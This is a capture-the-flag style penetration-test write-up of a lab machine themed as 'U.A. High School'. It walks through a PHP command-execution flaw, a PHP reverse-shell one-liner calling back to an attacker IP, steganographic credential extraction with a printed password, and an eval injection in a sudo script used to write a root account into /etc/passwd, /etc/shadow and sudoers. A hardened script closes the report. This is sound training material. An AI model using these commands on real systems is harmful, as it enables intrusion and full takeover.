U.A. High School
This report details the findings of a penetration test conducted against a target system representing U.A. High School's network infrastructure. The test identified multiple vulnerabilities, leading to full system compromise (root access). The vulnerabilities exploited included:
- Remote Code Execution (RCE) via PHP `index.php`: a vulnerable PHP script allowed arbitrary command execution.
- Steganography: hidden data within an image file revealed user credentials.
- Insecure script permissions and `eval` command abuse: a poorly configured script with `sudo` privileges allowed privilege escalation to root.
The penetration test followed a standard methodology:
- Reconnaissance: Gathering information about the target.
- Scanning: Identifying open ports and services.
- Enumeration: Probing services for vulnerabilities and information.
- Exploitation: Gaining initial access using discovered vulnerabilities.
- Privilege Escalation: Elevating privileges to gain higher-level access.
- Post-Exploitation: Maintaining access and reaching the main objective.
1. Reconnaissance and Scanning
- Target Identification: The target IP address was identified as `10.10.252.176`.
- Port Scanning (Nmap): A comprehensive port scan using `nmap` revealed the following open ports:

```bash
export TARGET_IP=10.10.252.176
nmap -p- --min-rate 5000 $TARGET_IP
```

Output:

```
Not shown: 65325 closed tcp ports (reset), 208 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
```
2. Web Application Enumeration
- Directory Brute-Forcing (Feroxbuster): We used `feroxbuster` to discover hidden directories and files on the web server.

```bash
feroxbuster -u http://$TARGET_IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 -x txt,php,html
```

- Key Finding: The scan revealed an interesting file: `/assets/index.php`.
3. Exploiting Remote Code Execution (RCE)
- Vulnerability Analysis: Accessing `http://10.10.252.176/assets/index.php?cmd=id` resulted in a Base64-encoded string. Decoding this string revealed the output of the `id` command, confirming Remote Code Execution (RCE).

```bash
echo dWlkPTMzKHd3dy1kYXRhKSBnaWQ9MzMod3d3LWRhdGEpIGdyb3Vwcz0zMyh3d3ctZGF0YSkK | base64 --decode
# Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

- Exploitation (Reverse Shell): A reverse shell was established using a PHP one-liner (`php -r '$sock=fsockopen("10.2.17.44",6666);exec("sh <&3 >&3 2>&3");'`) generated from revshells.com. This one-liner, when executed on the target, connects back to the attacker's machine.
- Attacker Machine (Setup): Start a netcat listener:

```bash
nc -lvnp 6666
```

- Target Machine (Exploit): Send the URL-encoded reverse shell payload:

```
http://10.10.252.176/assets/index.php?cmd=php%20-r%20%27%24sock%3Dfsockopen%28%2210.2.17.44%22%2C6666%29%3Bexec%28%22sh%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27
```

- Result: A shell was obtained as the `www-data` user.
4. File Analysis and Steganography
- File Enumeration: Within the webroot, two image files were found: `yuei.jpg` and `oneforall.jpg`. The `file` command revealed that `oneforall.jpg` was misidentified as data.

```bash
file ./images/oneforall.jpg # Output: oneforall.jpg: data
file ./images/yuei.jpg # Output: yuei.jpg: JPEG image data, ...
```

- File Transfer: The suspicious `oneforall.jpg` file was transferred to the attacker's machine for further analysis.

Target Machine:

```bash
python3 -m http.server 8000
```

Attacker Machine:

```bash
wget http://$TARGET_IP:8000/images/oneforall.jpg
```

- Header Correction: The file header was incorrect (identified as PNG data). It was manually corrected to a valid JFIF (JPEG) header using `hexedit` and `printf`. This is a crucial step for steganography tools to work correctly.

```bash
printf '\xff\xd8\xff\xe0\x00\x10\x4a\x46\x49\x46\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00' | dd of=oneforall.jpg bs=1 count=20 conv=notrunc
file oneforall.jpg # Now it will be recognized as a JPEG.
xdg-open oneforall.jpg # The image can also be viewed now.
```

- Explanation of the JFIF header: The `printf` command above constructs a minimal, valid JFIF header. This is essential because steganography tools often check for valid file headers before attempting to extract data.
- You can also change the header manually using `hexedit`: `FF D8 FF E0 00 10 4A 46 49 46 00 01 01 00 00 01 00 01 00 00` (you can ask an AI chat what each hex value means).
- Steganography Extraction (Steghide): A password file was located in the `/var/www/Hidden_Content` directory.

```bash
cat /var/www/Hidden_Content/passphrase.txt # QWxsbWlnaHRGb3JFdmVyISEhCg==
echo QWxsbWlnaHRGb3JFdmVyISEhCg== | base64 --decode # AllmightForEver!!!
```

- The Base64-decoded string (`AllmightForEver!!!`) was used as the passphrase to extract the hidden data.

```bash
steghide extract -sf oneforall.jpg
# Enter passphrase: AllmightForEver!!!
cat creds.txt # Output: deku:One?For?All_!!one1/A
```

- Credential Discovery: The extracted data (`creds.txt`) contained the username `deku` and a corresponding password.
5. Privilege Escalation
- SSH Login: The discovered credentials were used to log in to the target system via SSH.

```bash
ssh deku@$TARGET_IP
# Password: One?For?All_!!one1/A
```

- Sudo Rights Enumeration: The `sudo -l` command was used to check the user's sudo privileges.

```bash
sudo -l
# Output: (ALL) /opt/NewComponent/feedback.sh
```

This shows that the `deku` user can run `/opt/NewComponent/feedback.sh` as root.

- Vulnerable Script Analysis: The `feedback.sh` script was examined. It takes user input and uses `eval` to echo it, creating a command injection vulnerability. The script attempts to filter some special characters, but the filtering is insufficient.

```bash
cat /opt/NewComponent/feedback.sh
```

Output:

```bash
#!/bin/bash
echo "Enter your feedback:"
read feedback
if [[ "$feedback" != *"\`"* && "$feedback" != *")"* && "$feedback" != *"\$("* && "$feedback" != *"|"* && "$feedback" != *"&"* && "$feedback" != *";"* && "$feedback" != *"?"* && "$feedback" != *"!"* && "$feedback" != *"\\"* ]]; then
echo "It is This:"
eval "echo $feedback"
echo "$feedback" >> /var/log/feedback.txt
echo "Feedback successfully saved."
else
echo "Invalid input. Please provide a valid input."
fi
```

- Exploitation (Adding a Root User): The `eval` vulnerability was exploited to add a new user (`b0end`) to the `/etc/passwd` and `/etc/shadow` files, effectively creating a root-privileged account. `openssl` was used to generate the password hash. In each step below, the commented line is the text entered at the "Enter your feedback:" prompt.

First, create the user:

```bash
sudo /opt/NewComponent/feedback.sh
# "b0end:x:7777:7777:b0end:/home/b0end:/bin/bash" >> /etc/passwd
```

Second, get a hashed password:

```bash
openssl passwd -crypt Aav3r15tr0ngpaSS # Replace with a strong password. Output example: JBAiFDzIQqipE
```

Third, add it to the shadow file:

```bash
sudo /opt/NewComponent/feedback.sh
# "b0end:JBAiFDzIQqipE:0:0:99999:7:::" >> /etc/shadow
```

Fourth, add the user to the sudoers file:

```bash
sudo /opt/NewComponent/feedback.sh
# b0end ALL=(ALL) NOPASSWD: ALL >> /etc/sudoers
```

- Root Shell: The newly created user was used to gain a root shell.

```bash
su b0end
# [Enter the password you set]
sudo su
id # Output: uid=0(root) gid=0(root) groups=0(root)
```
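For contrast with the vulnerable `feedback.sh` above, here is a hardened counterpart written for this report as an added example (it is not the target's script). It removes `eval` entirely and replaces the character blacklist, which does not stop `>>` redirection, with an allowlist; the log path is an assumption taken from the write-up.

```shell
#!/bin/sh
# Hardened counterpart to the feedback.sh pattern above (added example, not the
# target's script). Two changes: user input is never handed to eval, and the
# character filter is an allowlist rather than the original blacklist.

# Return 0 if input is non-empty, at most 500 characters, and made only of letters,
# digits, space and . , : ? ! -  Anything else (quotes, redirections, newlines,
# $, backticks, slashes) fails.
valid_feedback() {
    input=$1
    [ -n "$input" ] || return 1
    [ "${#input}" -le 500 ] || return 1
    # Delete every allowed character; if anything survives, a disallowed one was
    # present. The trailing "x" stops $(...) from swallowing a leftover newline.
    rest=$(printf '%s' "$input" | tr -d 'A-Za-z0-9 .,:?!-'; echo x)
    [ "$rest" = "x" ]
}

# Append validated feedback to $2 (assumed log path; the write-up uses
# /var/log/feedback.txt) with printf, passing the text as a data argument so the
# shell never parses it as code.
save_feedback() {
    input=$1
    log=$2
    if ! valid_feedback "$input"; then
        echo "Invalid input. Please provide a valid input." >&2
        return 1
    fi
    printf '%s\n' "$input" >> "$log" || return 1
    printf 'It is This: %s\n' "$input"
    echo "Feedback successfully saved."
}

# Stand-alone use: read one line from the user and save it (same prompt as the original).
if [ "${1:-}" = "--interactive" ]; then
    printf 'Enter your feedback: '
    IFS= read -r feedback
    save_feedback "$feedback" "${FEEDBACK_LOG:-/var/log/feedback.txt}"
fi
```

Because the input is only ever a string argument to `printf`, the `"..." >> /etc/passwd` line used in the exploitation step is rejected by the allowlist and, even if it were accepted, would be written to the log as literal text rather than executed.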